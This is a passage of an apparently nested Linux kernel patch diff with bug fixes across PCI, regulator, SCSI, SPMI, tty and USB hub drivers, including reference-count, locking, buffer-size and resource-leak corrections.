+@@ -3691,6 +3694,19 @@ static void quirk_no_pm_reset(struct pci_dev *dev)
+ DECLARE_PCI_FIXUP_CLASS_HEADER(PCI_VENDOR_ID_ATI, PCI_ANY_ID,
+ 			       PCI_CLASS_DISPLAY_VGA, 8, quirk_no_pm_reset);
+ 
++/*
++ * Spectrum-{1,2,3,4} devices report that a D3hot->D0 transition causes a reset
++ * (i.e., they advertise NoSoftRst-). However, this transition does not have
++ * any effect on the device: It continues to be operational and network ports
++ * remain up. Advertising this support makes it seem as if a PM reset is viable
++ * for these devices. Mark it as unavailable to skip it when testing reset
++ * methods.
++ */
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MELLANOX, 0xcb84, quirk_no_pm_reset);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MELLANOX, 0xcf6c, quirk_no_pm_reset);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MELLANOX, 0xcf70, quirk_no_pm_reset);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MELLANOX, 0xcf80, quirk_no_pm_reset);
++
+ /*
+  * Thunderbolt controllers with broken MSI hotplug signaling:
+  * Entire 1st generation (Light Ridge, Eagle Ridge, Light Peak) and part
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index 0c1faa6c1973a..3f3320d0a4f8f 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -1308,13 +1308,6 @@ static void stdev_release(struct device *dev)
+ {
+ 	struct switchtec_dev *stdev = to_stdev(dev);
+ 
+-	if (stdev->dma_mrpc) {
+-		iowrite32(0, &stdev->mmio_mrpc->dma_en);
+-		flush_wc_buf(stdev);
+-		writeq(0, &stdev->mmio_mrpc->dma_addr);
+-		dma_free_coherent(&stdev->pdev->dev, sizeof(*stdev->dma_mrpc),
+-				stdev->dma_mrpc, stdev->dma_mrpc_dma_addr);
+-	}
+ 	kfree(stdev);
+ }
+ 
+@@ -1358,7 +1351,7 @@ static struct switchtec_dev *stdev_create(struct pci_dev *pdev)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	stdev->alive = true;
+-	stdev->pdev = pdev;
++	stdev->pdev = pci_dev_get(pdev);
+ 	INIT_LIST_HEAD(&stdev->mrpc_queue);
+ 	mutex_init(&stdev->mrpc_mutex);
+ 	stdev->mrpc_busy = 0;
+@@ -1391,6 +1384,7 @@ static struct switchtec_dev *stdev_create(struct pci_dev *pdev)
+ 	return stdev;
+ 
+ err_put:
++	pci_dev_put(stdev->pdev);
+ 	put_device(&stdev->dev);
+ 	return ERR_PTR(rc);
+ }
+@@ -1646,6 +1640,18 @@ static int switchtec_init_pci(struct switchtec_dev *stdev,
+ 	return 0;
+ }
+ 
++static void switchtec_exit_pci(struct switchtec_dev *stdev)
++{
++	if (stdev->dma_mrpc) {
++		iowrite32(0, &stdev->mmio_mrpc->dma_en);
++		flush_wc_buf(stdev);
++		writeq(0, &stdev->mmio_mrpc->dma_addr);
++		dma_free_coherent(&stdev->pdev->dev, sizeof(*stdev->dma_mrpc),
++				  stdev->dma_mrpc, stdev->dma_mrpc_dma_addr);
++		stdev->dma_mrpc = NULL;
++	}
++}
++
+ static int switchtec_pci_probe(struct pci_dev *pdev,
+ 			       const struct pci_device_id *id)
+ {
+@@ -1705,6 +1711,9 @@ static void switchtec_pci_remove(struct pci_dev *pdev)
+ 	ida_free(&switchtec_minor_ida, MINOR(stdev->dev.devt));
+ 	dev_info(&stdev->dev, "unregistered.\n");
+ 	stdev_kill(stdev);
++	switchtec_exit_pci(stdev);
++	pci_dev_put(stdev->pdev);
++	stdev->pdev = NULL;
+ 	put_device(&stdev->dev);
+ }
+ 
+diff --git a/drivers/pnp/pnpacpi/rsparser.c b/drivers/pnp/pnpacpi/rsparser.c
+index 4f05f610391b0..c02ce0834c2cd 100644
+--- a/drivers/pnp/pnpacpi/rsparser.c
++++ b/drivers/pnp/pnpacpi/rsparser.c
+@@ -151,13 +151,13 @@ static int vendor_resource_matches(struct pnp_dev *dev,
+ static void pnpacpi_parse_allocated_vendor(struct pnp_dev *dev,
+ 				    struct acpi_resource_vendor_typed *vendor)
+ {
+-	if (vendor_resource_matches(dev, vendor, &hp_ccsr_uuid, 16)) {
+-		u64 start, length;
++	struct { u64 start, length; } range;
+ 
+-		memcpy(&start, vendor->byte_data, sizeof(start));
+-		memcpy(&length, vendor->byte_data + 8, sizeof(length));
+-
+-		pnp_add_mem_resource(dev, start, start + length - 1, 0);
++	if (vendor_resource_matches(dev, vendor, &hp_ccsr_uuid,
++				    sizeof(range))) {
++		memcpy(&range, vendor->byte_data, sizeof(range));
++		pnp_add_mem_resource(dev, range.start, range.start +
++				     range.length - 1, 0);
+ 	}
+ }
+ 
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index 34d3d82819064..c8702011b7613 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -2925,7 +2925,8 @@ static int _regulator_enable(struct regulator *regulator)
+ 		/* Fallthrough on positive return values - already enabled */
+ 	}
+ 
+-	rdev->use_count++;
++	if (regulator->enable_count == 1)
++		rdev->use_count++;
+ 
+ 	return 0;
+ 
+@@ -3000,37 +3001,40 @@ static int _regulator_disable(struct regulator *regulator)
+ 
+ 	lockdep_assert_held_once(&rdev->mutex.base);
+ 
+-	if (WARN(rdev->use_count <= 0,
++	if (WARN(regulator->enable_count == 0,
+ 		 "unbalanced disables for %s\n", rdev_get_name(rdev)))
+ 		return -EIO;
+ 
+-	/* are we the last user and permitted to disable ? */
+-	if (rdev->use_count == 1 &&
+-	    (rdev->constraints && !rdev->constraints->always_on)) {
+-
+-		/* we are last user */
+-		if (regulator_ops_is_valid(rdev, REGULATOR_CHANGE_STATUS)) {
+-			ret = _notifier_call_chain(rdev,
+-						   REGULATOR_EVENT_PRE_DISABLE,
+-						   NULL);
+-			if (ret & NOTIFY_STOP_MASK)
+-				return -EINVAL;
+-
+-			ret = _regulator_do_disable(rdev);
+-			if (ret < 0) {
+-				rdev_err(rdev, "failed to disable: %pe\n", ERR_PTR(ret));
+-				_notifier_call_chain(rdev,
+-						REGULATOR_EVENT_ABORT_DISABLE,
++	if (regulator->enable_count == 1) {
++	/* disabling last enable_count from this regulator */
++		/* are we the last user and permitted to disable ? */
++		if (rdev->use_count == 1 &&
++		    (rdev->constraints && !rdev->constraints->always_on)) {
++
++			/* we are last user */
++			if (regulator_ops_is_valid(rdev, REGULATOR_CHANGE_STATUS)) {
++				ret = _notifier_call_chain(rdev,
++							   REGULATOR_EVENT_PRE_DISABLE,
++							   NULL);
++				if (ret & NOTIFY_STOP_MASK)
++					return -EINVAL;
++
++				ret = _regulator_do_disable(rdev);
++				if (ret < 0) {
++					rdev_err(rdev, "failed to disable: %pe\n", ERR_PTR(ret));
++					_notifier_call_chain(rdev,
++							REGULATOR_EVENT_ABORT_DISABLE,
++							NULL);
++					return ret;
++				}
++				_notifier_call_chain(rdev, REGULATOR_EVENT_DISABLE,
+ 						NULL);
+-				return ret;
+ 			}
+-			_notifier_call_chain(rdev, REGULATOR_EVENT_DISABLE,
+-					NULL);
+-		}
+ 
+-		rdev->use_count = 0;
+-	} else if (rdev->use_count > 1) {
+-		rdev->use_count--;
++			rdev->use_count = 0;
++		} else if (rdev->use_count > 1) {
++			rdev->use_count--;
++		}
+ 	}
+ 
+ 	if (ret == 0)
+diff --git a/drivers/regulator/ti-abb-regulator.c b/drivers/regulator/ti-abb-regulator.c
+index 115345e9fdedc..82af27b0e4698 100644
+--- a/drivers/regulator/ti-abb-regulator.c
++++ b/drivers/regulator/ti-abb-regulator.c
+@@ -734,9 +734,25 @@ static int ti_abb_probe(struct platform_device *pdev)
+ 			return PTR_ERR(abb->setup_reg);
+ 	}
+ 
+-	abb->int_base = devm_platform_ioremap_resource_byname(pdev, "int-address");
+-	if (IS_ERR(abb->int_base))
+-		return PTR_ERR(abb->int_base);
++	pname = "int-address";
++	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, pname);
++	if (!res) {
++		dev_err(dev, "Missing '%s' IO resource\n", pname);
++		return -ENODEV;
++	}
++	/*
++	 * The MPU interrupt status register (PRM_IRQSTATUS_MPU) is
++	 * shared between regulator-abb-{ivahd,dspeve,gpu} driver
++	 * instances. Therefore use devm_ioremap() rather than
++	 * devm_platform_ioremap_resource_byname() to avoid busy
++	 * resource region conflicts.
++	 */
++	abb->int_base = devm_ioremap(dev, res->start,
++					     resource_size(res));
++	if (!abb->int_base) {
++		dev_err(dev, "Unable to map '%s'\n", pname);
++		return -ENOMEM;
++	}
+ 
+ 	/* Map Optional resources */
+ 	pname = "efuse-address";
+diff --git a/drivers/s390/crypto/vfio_ap_ops.c b/drivers/s390/crypto/vfio_ap_ops.c
+index 0659aa2863ab0..86a8bd5324899 100644
+--- a/drivers/s390/crypto/vfio_ap_ops.c
++++ b/drivers/s390/crypto/vfio_ap_ops.c
+@@ -1742,6 +1742,7 @@ static ssize_t status_show(struct device *dev,
+ {
+ 	ssize_t nchars = 0;
+ 	struct vfio_ap_queue *q;
++	unsigned long apid, apqi;
+ 	struct ap_matrix_mdev *matrix_mdev;
+ 	struct ap_device *apdev = to_ap_dev(dev);
+ 
+@@ -1749,8 +1750,21 @@ static ssize_t status_show(struct device *dev,
+ 	q = dev_get_drvdata(&apdev->device);
+ 	matrix_mdev = vfio_ap_mdev_for_queue(q);
+ 
++	/* If the queue is assigned to the matrix mediated device, then
++	 * determine whether it is passed through to a guest; otherwise,
++	 * indicate that it is unassigned.
++	 */
+ 	if (matrix_mdev) {
+-		if (matrix_mdev->kvm)
++		apid = AP_QID_CARD(q->apqn);
++		apqi = AP_QID_QUEUE(q->apqn);
++		/*
++		 * If the queue is passed through to the guest, then indicate
++		 * that it is in use; otherwise, indicate that it is
++		 * merely assigned to a matrix mediated device.
++		 */
++		if (matrix_mdev->kvm &&
++		    test_bit_inv(apid, matrix_mdev->shadow_apcb.apm) &&
++		    test_bit_inv(apqi, matrix_mdev->shadow_apcb.aqm))
+ 			nchars = scnprintf(buf, PAGE_SIZE, "%s\n",
+ 					   AP_QUEUE_IN_USE);
+ 		else
+diff --git a/drivers/scsi/arcmsr/arcmsr.h b/drivers/scsi/arcmsr/arcmsr.h
+index 07df255c4b1bd..b513d4d9c35a0 100644
+--- a/drivers/scsi/arcmsr/arcmsr.h
++++ b/drivers/scsi/arcmsr/arcmsr.h
+@@ -77,9 +77,13 @@ struct device_attribute;
+ #ifndef PCI_DEVICE_ID_ARECA_1203
+ #define PCI_DEVICE_ID_ARECA_1203	0x1203
+ #endif
++#ifndef PCI_DEVICE_ID_ARECA_1883
++#define PCI_DEVICE_ID_ARECA_1883	0x1883
++#endif
+ #ifndef PCI_DEVICE_ID_ARECA_1884
+ #define PCI_DEVICE_ID_ARECA_1884	0x1884
+ #endif
++#define PCI_DEVICE_ID_ARECA_1886_0	0x1886
+ #define PCI_DEVICE_ID_ARECA_1886	0x188A
+ #define	ARCMSR_HOURS			(1000 * 60 * 60 * 4)
+ #define	ARCMSR_MINUTES			(1000 * 60 * 60)
+diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
+index d3fb8a9c1c392..fc9d4005830b0 100644
+--- a/drivers/scsi/arcmsr/arcmsr_hba.c
++++ b/drivers/scsi/arcmsr/arcmsr_hba.c
+@@ -214,8 +214,12 @@ static struct pci_device_id arcmsr_device_id_table[] = {
+ 		.driver_data = ACB_ADAPTER_TYPE_A},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1880),
+ 		.driver_data = ACB_ADAPTER_TYPE_C},
++	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1883),
++		.driver_data = ACB_ADAPTER_TYPE_C},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1884),
+ 		.driver_data = ACB_ADAPTER_TYPE_E},
++	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1886_0),
++		.driver_data = ACB_ADAPTER_TYPE_F},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1886),
+ 		.driver_data = ACB_ADAPTER_TYPE_F},
+ 	{0, 0}, /* Terminating entry */
+@@ -4708,9 +4712,11 @@ static const char *arcmsr_info(struct Scsi_Host *host)
+ 	case PCI_DEVICE_ID_ARECA_1680:
+ 	case PCI_DEVICE_ID_ARECA_1681:
+ 	case PCI_DEVICE_ID_ARECA_1880:
++	case PCI_DEVICE_ID_ARECA_1883:
+ 	case PCI_DEVICE_ID_ARECA_1884:
+ 		type = "SAS/SATA";
+ 		break;
++	case PCI_DEVICE_ID_ARECA_1886_0:
+ 	case PCI_DEVICE_ID_ARECA_1886:
+ 		type = "NVMe/SAS/SATA";
+ 		break;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index 0c80ff9affa39..7ae56a2fe2325 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -1565,6 +1565,11 @@ static irqreturn_t phy_up_v3_hw(int phy_no, struct hisi_hba *hisi_hba)
+ 	}
+ 
+ 	phy->port_id = port_id;
++	spin_lock(&phy->lock);
++	/* Delete timer and set phy_attached atomically */
++	del_timer(&phy->timer);
++	phy->phy_attached = 1;
++	spin_unlock(&phy->lock);
+ 
+ 	/*
+ 	 * Call pm_runtime_get_noresume() which pairs with
+@@ -1578,11 +1583,6 @@ static irqreturn_t phy_up_v3_hw(int phy_no, struct hisi_hba *hisi_hba)
+ 
+ 	res = IRQ_HANDLED;
+ 
+-	spin_lock(&phy->lock);
+-	/* Delete timer and set phy_attached atomically */
+-	del_timer(&phy->timer);
+-	phy->phy_attached = 1;
+-	spin_unlock(&phy->lock);
+ end:
+ 	if (phy->reset_completion)
+ 		complete(phy->reset_completion);
+diff --git a/drivers/scsi/isci/request.c b/drivers/scsi/isci/request.c
+index 6370cdbfba08c..0f0732d56800d 100644
+--- a/drivers/scsi/isci/request.c
++++ b/drivers/scsi/isci/request.c
+@@ -3390,7 +3390,7 @@ static enum sci_status isci_io_request_build(struct isci_host *ihost,
+ 		return SCI_FAILURE;
+ 	}
+ 
+-	return SCI_SUCCESS;
++	return status;
+ }
+ 
+ static struct isci_request *isci_request_from_tag(struct isci_host *ihost, u16 tag)
+diff --git a/drivers/scsi/libfc/fc_fcp.c b/drivers/scsi/libfc/fc_fcp.c
+index 945adca5e72fd..05be0810b5e31 100644
+--- a/drivers/scsi/libfc/fc_fcp.c
++++ b/drivers/scsi/libfc/fc_fcp.c
+@@ -265,6 +265,11 @@ static int fc_fcp_send_abort(struct fc_fcp_pkt *fsp)
+ 	if (!fsp->seq_ptr)
+ 		return -EINVAL;
+ 
++	if (fsp->state & FC_SRB_ABORT_PENDING) {
++		FC_FCP_DBG(fsp, "abort already pending\n");
++		return -EBUSY;
++	}
++
+ 	this_cpu_inc(fsp->lp->stats->FcpPktAborts);
+ 
+ 	fsp->state |= FC_SRB_ABORT_PENDING;
+@@ -1671,7 +1676,7 @@ static void fc_fcp_rec_error(struct fc_fcp_pkt *fsp, struct fc_frame *fp)
+ 		if (fsp->recov_retry++ < FC_MAX_RECOV_RETRY)
+ 			fc_fcp_rec(fsp);
+ 		else
+-			fc_fcp_recovery(fsp, FC_ERROR);
++			fc_fcp_recovery(fsp, FC_TIMED_OUT);
+ 		break;
+ 	}
+ 	fc_fcp_unlock_pkt(fsp);
+@@ -1690,11 +1695,12 @@ static void fc_fcp_recovery(struct fc_fcp_pkt *fsp, u8 code)
+ 	fsp->status_code = code;
+ 	fsp->cdb_status = 0;
+ 	fsp->io_status = 0;
+-	/*
+-	 * if this fails then we let the scsi command timer fire and
+-	 * scsi-ml escalate.
+-	 */
+-	fc_fcp_send_abort(fsp);
++	if (!fsp->cmd)
++		/*
++		 * Only abort non-scsi commands; otherwise let the
++		 * scsi command timer fire and scsi-ml escalate.
++		 */
++		fc_fcp_send_abort(fsp);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc.h b/drivers/scsi/lpfc/lpfc.h
+index 664ac3069c4be..dc5ac3cc70f6d 100644
+--- a/drivers/scsi/lpfc/lpfc.h
++++ b/drivers/scsi/lpfc/lpfc.h
+@@ -33,6 +33,7 @@
+ struct lpfc_sli2_slim;
+ 
+ #define ELX_MODEL_NAME_SIZE	80
++#define ELX_FW_NAME_SIZE	84
+ 
+ #define LPFC_PCI_DEV_LP		0x1
+ #define LPFC_PCI_DEV_OC		0x2
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index f59de61803dc8..1a0bafde34d86 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -14778,7 +14778,7 @@ out:
+ int
+ lpfc_sli4_request_firmware_update(struct lpfc_hba *phba, uint8_t fw_upgrade)
+ {
+-	uint8_t file_name[ELX_MODEL_NAME_SIZE];
++	char file_name[ELX_FW_NAME_SIZE] = {0};
+ 	int ret;
+ 	const struct firmware *fw;
+ 
+@@ -14787,7 +14787,7 @@ lpfc_sli4_request_firmware_update(struct lpfc_hba *phba, uint8_t fw_upgrade)
+ 	    LPFC_SLI_INTF_IF_TYPE_2)
+ 		return -EPERM;
+ 
+-	snprintf(file_name, ELX_MODEL_NAME_SIZE, "%s.grp", phba->ModelName);
++	scnprintf(file_name, sizeof(file_name), "%s.grp", phba->ModelName);
+ 
+ 	if (fw_upgrade == INT_FW_UPGRADE) {
+ 		ret = request_firmware_nowait(THIS_MODULE, FW_ACTION_UEVENT,
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index d2c7de804b998..41636c4c43af0 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1886,7 +1886,8 @@ static int mpi3mr_create_op_reply_q(struct mpi3mr_ioc *mrioc, u16 qidx)
+ 
+ 	reply_qid = qidx + 1;
+ 	op_reply_q->num_replies = MPI3MR_OP_REP_Q_QD;
+-	if (!mrioc->pdev->revision)
++	if ((mrioc->pdev->device == MPI3_MFGPAGE_DEVID_SAS4116) &&
++		!mrioc->pdev->revision)
+ 		op_reply_q->num_replies = MPI3MR_OP_REP_Q_QD4K;
+ 	op_reply_q->ci = 0;
+ 	op_reply_q->ephase = 1;
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 85f5b349c7e43..7a6b006e70c88 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -4963,7 +4963,10 @@ mpi3mr_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		mpi3mr_init_drv_cmd(&mrioc->evtack_cmds[i],
+ 				    MPI3MR_HOSTTAG_EVTACKCMD_MIN + i);
+ 
+-	if (pdev->revision)
++	if ((pdev->device == MPI3_MFGPAGE_DEVID_SAS4116) &&
++		!pdev->revision)
++		mrioc->enable_segqueue = false;
++	else
+ 		mrioc->enable_segqueue = true;
+ 
+ 	init_waitqueue_head(&mrioc->reset_waitq);
+diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
+index 9a289d6f2e5ee..66290961c47c2 100644
+--- a/drivers/scsi/scsi_error.c
++++ b/drivers/scsi/scsi_error.c
+@@ -61,11 +61,11 @@ static int scsi_eh_try_stu(struct scsi_cmnd *scmd);
+ static enum scsi_disposition scsi_try_to_abort_cmd(struct scsi_host_template *,
+ 						   struct scsi_cmnd *);
+ 
+-void scsi_eh_wakeup(struct Scsi_Host *shost)
++void scsi_eh_wakeup(struct Scsi_Host *shost, unsigned int busy)
+ {
+ 	lockdep_assert_held(shost->host_lock);
+ 
+-	if (scsi_host_busy(shost) == shost->host_failed) {
++	if (busy == shost->host_failed) {
+ 		trace_scsi_eh_wakeup(shost);
+ 		wake_up_process(shost->ehandler);
+ 		SCSI_LOG_ERROR_RECOVERY(5, shost_printk(KERN_INFO, shost,
+@@ -88,7 +88,7 @@ void scsi_schedule_eh(struct Scsi_Host *shost)
+ 	if (scsi_host_set_state(shost, SHOST_RECOVERY) == 0 ||
+ 	    scsi_host_set_state(shost, SHOST_CANCEL_RECOVERY) == 0) {
+ 		shost->host_eh_scheduled++;
+-		scsi_eh_wakeup(shost);
++		scsi_eh_wakeup(shost, scsi_host_busy(shost));
+ 	}
+ 
+ 	spin_unlock_irqrestore(shost->host_lock, flags);
+@@ -281,7 +281,7 @@ static void scsi_eh_inc_host_failed(struct rcu_head *head)
+ 
+ 	spin_lock_irqsave(shost->host_lock, flags);
+ 	shost->host_failed++;
+-	scsi_eh_wakeup(shost);
++	scsi_eh_wakeup(shost, scsi_host_busy(shost));
+ 	spin_unlock_irqrestore(shost->host_lock, flags);
+ }
+ 
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index d25e1c2472538..0e7e9f1e5a029 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -282,7 +282,7 @@ static void scsi_dec_host_busy(struct Scsi_Host *shost, struct scsi_cmnd *cmd)
+ 	if (unlikely(scsi_host_in_recovery(shost))) {
+ 		spin_lock_irqsave(shost->host_lock, flags);
+ 		if (shost->host_failed || shost->host_eh_scheduled)
+-			scsi_eh_wakeup(shost);
++			scsi_eh_wakeup(shost, scsi_host_busy(shost));
+ 		spin_unlock_irqrestore(shost->host_lock, flags);
+ 	}
+ 	rcu_read_unlock();
+diff --git a/drivers/scsi/scsi_priv.h b/drivers/scsi/scsi_priv.h
+index b14545acb40f5..9b5fb30e684be 100644
+--- a/drivers/scsi/scsi_priv.h
++++ b/drivers/scsi/scsi_priv.h
+@@ -86,7 +86,7 @@ extern void scmd_eh_abort_handler(struct work_struct *work);
+ extern enum blk_eh_timer_return scsi_timeout(struct request *req);
+ extern int scsi_error_handler(void *host);
+ extern enum scsi_disposition scsi_decide_disposition(struct scsi_cmnd *cmd);
+-extern void scsi_eh_wakeup(struct Scsi_Host *shost);
++extern void scsi_eh_wakeup(struct Scsi_Host *shost, unsigned int busy);
+ extern void scsi_eh_scmd_add(struct scsi_cmnd *);
+ void scsi_eh_ready_devs(struct Scsi_Host *shost,
+ 			struct list_head *work_q,
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index f9d9b82b562da..8293cc40047fa 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -477,7 +477,7 @@ static void xlnx_call_notify_cb_handler(const u32 *payload)
+ 		}
+ 	}
+ 	if (!is_callback_found)
+-		pr_warn("Didn't find any registered callback for 0x%x 0x%x\n",
++		pr_warn("Unhandled SGI node 0x%x event 0x%x. Expected with Xen hypervisor\n",
+ 			payload[1], payload[2]);
+ }
+ 
+@@ -555,7 +555,7 @@ static void xlnx_disable_percpu_irq(void *data)
+ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ {
+ 	int ret = 0;
+-	int cpu = smp_processor_id();
++	int cpu;
+ 	/*
+ 	 * IRQ related structures are used for the following:
+ 	 * for each SGI interrupt ensure its mapped by GIC IRQ domain
+@@ -592,9 +592,12 @@ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ 	sgi_fwspec.param[0] = sgi_num;
+ 	virq_sgi = irq_create_fwspec_mapping(&sgi_fwspec);
+ 
++	cpu = get_cpu();
+ 	per_cpu(cpu_number1, cpu) = cpu;
+ 	ret = request_percpu_irq(virq_sgi, xlnx_event_handler, "xlnx_event_mgmt",
+ 				 &cpu_number1);
++	put_cpu();
++
+ 	WARN_ON(ret);
+ 	if (ret) {
+ 		irq_dispose_mapping(virq_sgi);
+diff --git a/drivers/spmi/spmi-mtk-pmif.c b/drivers/spmi/spmi-mtk-pmif.c
+index 01e8851e639d5..bf8c0d4109b19 100644
+--- a/drivers/spmi/spmi-mtk-pmif.c
++++ b/drivers/spmi/spmi-mtk-pmif.c
+@@ -475,7 +475,7 @@ static int mtk_spmi_probe(struct platform_device *pdev)
+ 	for (i = 0; i < arb->nclks; i++)
+ 		arb->clks[i].id = pmif_clock_names[i];
+ 
+-	err = devm_clk_bulk_get(&pdev->dev, arb->nclks, arb->clks);
++	err = clk_bulk_get(&pdev->dev, arb->nclks, arb->clks);
+ 	if (err) {
+ 		dev_err(&pdev->dev, "Failed to get clocks: %d\n", err);
+ 		goto err_put_ctrl;
+@@ -484,7 +484,7 @@ static int mtk_spmi_probe(struct platform_device *pdev)
+ 	err = clk_bulk_prepare_enable(arb->nclks, arb->clks);
+ 	if (err) {
+ 		dev_err(&pdev->dev, "Failed to enable clocks: %d\n", err);
+-		goto err_put_ctrl;
++		goto err_put_clks;
+ 	}
+ 
+ 	ctrl->cmd = pmif_arb_cmd;
+@@ -510,6 +510,8 @@ static int mtk_spmi_probe(struct platform_device *pdev)
+ 
+ err_domain_remove:
+ 	clk_bulk_disable_unprepare(arb->nclks, arb->clks);
++err_put_clks:
++	clk_bulk_put(arb->nclks, arb->clks);
+ err_put_ctrl:
+ 	spmi_controller_put(ctrl);
+ 	return err;
+@@ -521,6 +523,7 @@ static int mtk_spmi_remove(struct platform_device *pdev)
+ 	struct pmif *arb = spmi_controller_get_drvdata(ctrl);
+ 
+ 	clk_bulk_disable_unprepare(arb->nclks, arb->clks);
++	clk_bulk_put(arb->nclks, arb->clks);
+ 	spmi_controller_remove(ctrl);
+ 	spmi_controller_put(ctrl);
+ 	return 0;
+diff --git a/drivers/tty/tty_ioctl.c b/drivers/tty/tty_ioctl.c
+index 8767c504b95dd..9d3b237304eae 100644
+--- a/drivers/tty/tty_ioctl.c
++++ b/drivers/tty/tty_ioctl.c
+@@ -859,7 +859,7 @@ int tty_mode_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 			ret = -EFAULT;
+ 		return ret;
+ 	case TIOCSLCKTRMIOS:
+-		if (!capable(CAP_SYS_ADMIN))
++		if (!checkpoint_restore_ns_capable(&init_user_ns))
+ 			return -EPERM;
+ 		copy_termios_locked(real_tty, &kterm);
+ 		if (user_termios_to_kernel_termios(&kterm,
+@@ -876,7 +876,7 @@ int tty_mode_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 			ret = -EFAULT;
+ 		return ret;
+ 	case TIOCSLCKTRMIOS:
+-		if (!capable(CAP_SYS_ADMIN))
++		if (!checkpoint_restore_ns_capable(&init_user_ns))
+ 			return -EPERM;
+ 		copy_termios_locked(real_tty, &kterm);
+ 		if (user_termios_to_kernel_termios_1(&kterm,
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 81c8f564cf878..4f181110d00db 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -47,12 +47,18 @@
+ #define USB_VENDOR_TEXAS_INSTRUMENTS		0x0451
+ #define USB_PRODUCT_TUSB8041_USB3		0x8140
+ #define USB_PRODUCT_TUSB8041_USB2		0x8142
+-#define HUB_QUIRK_CHECK_PORT_AUTOSUSPEND	0x01
+-#define HUB_QUIRK_DISABLE_AUTOSUSPEND		0x02
++#define USB_VENDOR_MICROCHIP			0x0424
++#define USB_PRODUCT_USB4913			0x4913
++#define USB_PRODUCT_USB4914			0x4914
++#define USB_PRODUCT_USB4915			0x4915
++#define HUB_QUIRK_CHECK_PORT_AUTOSUSPEND	BIT(0)
++#define HUB_QUIRK_DISABLE_AUTOSUSPEND		BIT(1)
++#define HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL	BIT(2)
+ 
+ #define USB_TP_TRANSMISSION_DELAY	40	/* ns */
+ #define USB_TP_TRANSMISSION_DELAY_MAX	65535	/* ns */
+ #define USB_PING_RESPONSE_TIME		400	/* ns */
++#define USB_REDUCE_FRAME_INTR_BINTERVAL	9
+ 
+ /* Protect struct usb_device->state and ->children members
+  * Note: Both are also protected by ->dev.sem, except that ->state can
+@@ -1904,6 +1910,14 @@ static int hub_probe(struct usb_interface *intf, const struct usb_device_id *id)
+ 		usb_autopm_get_interface_no_resume(intf);
+ 	}
+ 
++	if ((id->driver_info & HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL) &&
++	    desc->endpoint[0].desc.bInterval > USB_REDUCE_FRAME_INTR_BINTERVAL) {
++		desc->endpoint[0].desc.bInterval =
++			USB_REDUCE_FRAME_INTR_BINTERVAL;
++		/* Tell the HCD about the interrupt ep's new bInterval */
++		usb_set_interface(hdev, 0, 0);
++	}
++
+ 	if (hub_configure(hub, &desc->endpoint[0].desc) >= 0) {
+ 		onboard_hub_create_pdevs(hdev, &hub->onboard_hub_devs);
+ 
+@@ -5885,6 +5899,21 @@ static const struct usb_device_id hub_id_table[] = {
+       .idVendor = USB_VENDOR_TEXAS_INSTRUMENTS,
+       .idProduct = USB_PRODUCT_TUSB8041_USB3,
+       .driver_info = HUB_QUIRK_DISABLE_AUTOSUSPEND},
++	{ .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++	  .idVendor = USB_VENDOR_MICROCHIP,
++	  .idProduct = USB_PRODUCT_USB4913,
